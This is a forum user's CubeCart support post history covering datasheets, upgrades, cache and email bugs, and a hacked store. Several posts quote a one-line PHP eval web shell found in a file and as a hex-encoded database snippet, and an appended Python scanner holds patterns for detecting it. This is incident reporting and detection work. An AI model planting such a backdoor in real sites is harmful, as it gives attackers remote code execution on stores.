Everything posted by Frank Auffret

  1. Yes thanks, I used the downloads system to upload the pdf then just copied the url into the link in the product description. Then just changed the .htaccess file protecting the downloads folder. Easy enough for me but the client will require something less clunky. Senior moment! Just remembered this will do until I find a more client-friendly mod
  2. Are there any mods available to add product datasheets (pdf) with admin function?
  3. My server runs PHP 5.4.45 so does that mean the latest CC upgrade won't install or won't work after it installs?
  4. In Version 6.0.11. Thanks bsmither - Works for me!
     In the file /includes/ckeditor/config.js:
     Around line: 8
     Add after
         config.filebrowserBrowseUrl = document.location.pathname+'?_g=filemanager&mode=fck';
         config.filebrowserBrowseUrl = document.location.pathname+'?_g=filemanager&mode=fck_digital';
     Then as above
     In the file /admin/sources/filemanager.index.inc.php:
     Find near line 28:
         case 'digital':
             $mode = FileManager::FM_FILETYPE_DL;
             break;
     On a new blank line ABOVE that, add:
         case 'fck_digital':
             $GLOBALS['main']->hideNavigation(true);
             $select_button = true;
  5. The store (5.2.16) was patched on September 7th and upgraded to 6.0.8 on December 9 shortly before the attack - spotted on December 18. I upgraded all other sites at same time so would have checked for malicious folders, files and snippets in includes/extra (can't remember if I checked the table though). It's a dedicated webserver so I'll see if I can find out when the file adminer.php was uploaded and the code snippet added to the table. I can see from the Cubecart staff access logs there are two successful admin logins recorded with no admin username and dodgy IP numbers.
     Dec 14 2015, 22:41 PM 93.115.95.216
     Nov 28 2015, 04:12 AM 142.4.213.25
     All other login IPs check out OK. It looks like access was made without a username on December 14 & November 28. Was it possible to do this using the original security issue? Is there anything else I should check?
  6. Hi bsmither. Thanks for your reply. I did remove the snippet from the table as well and I checked all of my CC sites today to make sure there's nothing malicious. Although three of them were affected earlier this month, this particular site hasn't been attacked before. I added the admin fix last September when the security alert was posted and I have now upgraded each site to 6.0.8. Just left wondering how these snippets and files get uploaded?
  7. I just had similar with Cubecart 6.0.8. Since the previous attack I regularly check all Cubecart sites (all 6.0.8) and today I found a code snippet in the hooks. I went through all the files and removed anything that was either not supposed to be there or redundant. Checking the staff logs I spotted this entry but no username.
     Dec 14 2015, 22:41 PM 93.115.95.216 Y
     Edited to add: this site was not previously attacked. I found this file in the root: adminer.php
  8. Hi. All four of my websites that use Cube Cart were hacked this week and crap files and folders with advertising stuff uploaded to the root. I was using version 5.2.16 but have now upgraded all to 6.0.8. The server is set up with SuExec so no folders are writable from outside the server so I'm not sure how they got in. I am suspecting cKeditor but that's just a guess. It would be very useful to know where the vulnerability was/is. Has anyone else experienced this? Found previous post on subject - removed code snippets! Update: Just checked my files and the sites affected had the security patch added admin.class.php
  9. Hi bsmither. Sorry I've been away for a few days. So far no more link problems - since I deleted the snippet file. BTW I exported it from the DB before I deleted it, here's the sql:
         INSERT INTO `CubeCart_code_snippet` (`snippet_id`, `enabled`, `unique_id`, `description`, `hook_trigger`, `php_code`, `version`, `author`, `priority`) VALUES
         (1, 1, 'snippet8GsxU', 'Snippet', 'controller.index', 0x3c3f706870206576616c28245f524551554553545b223847737855225d293b3f3e, '', '', 3);
     Thanks for your help with this issue
  10. Thanks again for your suggestions. I managed to read the BLOB, it was same as file content:
         <?php eval($_REQUEST["8GsxU"]);?>
     I searched all tables but didn't find any reference to 8GsxU so I deleted the record - it wasn't there in the sql file migrated from the old server. The folders are all set to rwxr-xr-x because I am using suExec so don't know how that file arrived in that folder. I have deleted all site files except images and /includes/global.inc.php and re-upped from a clean version 5.2.16. Just have to see if it happens again
  11. Asked for logs but also found this file /includes/extra/snippet_0777be0bd41002b59fc2f777d9c7d77e.php created 14/05/2015, contains just one line:
         <?php eval($_REQUEST["8GsxU"]);?>
     Looks a bit suspicious to me
  12. Hmm, same thing happened again today. I did change the Session id last night so don't get this. This time I emptied the files from the cache manually so it's wait and see.
  13. Thanks for the reply, very odd thing this but I will take your advice regarding the session name and see what happens. Before I downloaded the site files from the old server I cleared the caches on both sites so any files in there would have been created after the migration was completed. I think the migrations of these two sites were on consecutive days, but still doesn't make a lot of sense as the site worked as it should for over a week - orders were received - then for some reason the URL of the other store got cached. Thanks again, much appreciated.
  14. This is weird! Two weeks ago I started migrating all my customers' sites to a new web server, starting with the Cubecart sites as they take a little longer to migrate. Cubecart site A was downloaded from the old server along with an export from the database then uploaded to the new server and tested all OK. A day or two later Cubecart site B followed same process, tested all OK. Site B took orders OK up until 2 days ago. Today I had a call from the client to say a customer had tried to buy online but when clicking the links in the left column, pages from Site A loaded? I checked and found the same issue. In admin the correct products were listed, all settings were normal. The caches were cleared and that reverted Site B to working order. I haven't touched either site since the migration so can anyone explain how that can happen? Both sites run CC version 5.2.16. Sorry, posted in wrong forum, should have been in General Technical Support. Mods can you help?
  15. OK test site seems to be working OK - not really a bug just missing files in version 5 skin templates folder?
  16. Hi. I just upgraded my CC test site to version 6.0.0b7. Works OK with foundation skin but version 5 skins didn't work and this error was logged:
         [Exception] xxxxxxxxxxxxxxx/store/includes/lib/smarty/sysplugins/smarty_internal_templatebase.php:127 - Unable to load template file 'templates/element.social.php'
     I added /element.social.php to the v5 skin templates folder and it now loads. Just wondering if there's anything else I need to do when using a version 5 skin?
  17. Phew thanks Bsmither I found a back up of filemanager and it worked.
  18. Trying to understand how images are associated with products. I have a customer who accidentally managed to delete all product images (no idea how). I re-installed them from backup and ran a database backup too. The images appeared in the admin images list after I ran update files list but all associations with the products are missing. I checked the image_index table and file associations seem to be intact - yet the products have no associated images. Is there something else I can do? UPDATED to say: DB filemanager file_id seems to have been re-numbered as file_ids no longer match those in the images_index table. Can this be fixed or is it a manual labour job going through each product?
  19. Older versions used to send admin email before the payment option was completed. I know some store managers didn't like that but I have two customers who use print order form as an alternative payment option so now they don't get any order notifications unless they log in to admin and change the order status manually. I have reported this as an issue. Thanks for your contributions
  20. OK, I changed the print order form (POF) setting to 'send mail' and received the customer confirmation OK. I also changed the administrators setting to 'Receive order notifications' but no admin emails arrived until I changed the order status to 'completed', then I received an admin email on both the store email and the administrator email. Previous versions used to send an admin email when the order was made even if payment failed. That I thought was good as it gave the store owner the option of calling the customer and asking if they wanted to pay by alternative means. Edited to add: Just set up card capture with 'send confirmation email' enabled - again received customer copy OK but didn't receive an admin email until after the order status was changed. With Card Capture the order status is only ever changed by the store administrator when processing the order so the admin email is only sent after the order has been processed - that's not a lot of use. Am I correct to assume that if using a payment gateway like Worldpay or Paypal the external process sends the payment status back to the site which changes the order status and sends the admin emails?
  21. I'm checking out a test version of 5.2.16 with only print order form and find that no email is sent to either the customer or the admin until the order status is changed to order complete. Is that normal?
  22. My problem fixed by Al at support. He said it was a new problem which he fixed by changing a line in /controllers/controller.admin.session.true.inc.php around line 80 depending on version from:
         $default_priority = $module_order[$_GET['type']][strtolower($_GET['module'])];
     to:
         $default_priority = 1;
     Hope this helps somebody
  23. I have the same issue on all of my Version 5 sites. If I try to edit a module all I see is a blank page or http 500 error in IE. I just installed version 5.1.6 on a spare domain and that has the same issue, can't edit any module. There's nothing in the Cube cart error logs.
  24. Hi. Can't seem to get image cropper to work. When trying to edit I see a small square portion of the image. When I click on the handle to expand it the image disappears altogether. Only the handle remains and can't be selected at all - any idea what can be wrong? I've just upgraded the site to V5.2.1
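
Added example, not part of the original posts: posts 9 to 11 above describe a backdoor stored as a hex BLOB in the `CubeCart_code_snippet` table. This Python check decodes the `0x...` literals in an SQL dump of that table and flags PHP that executes request input; the function names, the pattern list and the second (benign) row are constructed for illustration.

```python
import re

# 0x... literals, as MySQL dumps write BLOB columns such as php_code.
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")

# Heuristic chosen for this example: a code-executing PHP call whose
# argument list reads a request superglobal.
SUSPICIOUS = re.compile(
    r"\b(?:eval|assert|system|passthru|shell_exec|exec|create_function)"
    r"\s*\([^)]*\$_(?:REQUEST|GET|POST|COOKIE)\b",
    re.IGNORECASE,
)

def decode_hex_literals(sql_line):
    """Decode every 0x... literal on one line of an SQL dump to text."""
    return [
        bytes.fromhex(m.group(1)).decode("utf-8", errors="replace")
        for m in HEX_LITERAL.finditer(sql_line)
    ]

def scan_dump(lines, table="CubeCart_code_snippet"):
    """Return (line_no, decoded_php, is_suspicious) for rows of `table`."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        if table not in line:
            continue
        for php in decode_hex_literals(line):
            findings.append((line_no, php, bool(SUSPICIOUS.search(php))))
    return findings

# Row 1 is the INSERT quoted in post 9; row 2 is a constructed benign snippet.
BENIGN_HEX = "<?php echo 'hello'; ?>".encode().hex()
SAMPLE_DUMP = [
    "INSERT INTO `CubeCart_code_snippet` (`snippet_id`, `enabled`, `unique_id`, "
    "`description`, `hook_trigger`, `php_code`, `version`, `author`, `priority`) "
    "VALUES (1, 1, 'snippet8GsxU', 'Snippet', 'controller.index', "
    "0x3c3f706870206576616c28245f524551554553545b223847737855225d293b3f3e, "
    "'', '', 3);",
    "INSERT INTO `CubeCart_code_snippet` (`snippet_id`, `php_code`) "
    f"VALUES (2, 0x{BENIGN_HEX});",
]

if __name__ == "__main__":
    for line_no, php, bad in scan_dump(SAMPLE_DUMP):
        print(f"line {line_no}: {'SUSPICIOUS' if bad else 'ok'}: {php!r}")
```

A flagged row only covers the database side; post 11 shows the same payload written out as a file under /includes/extra, so that directory needs checking separately.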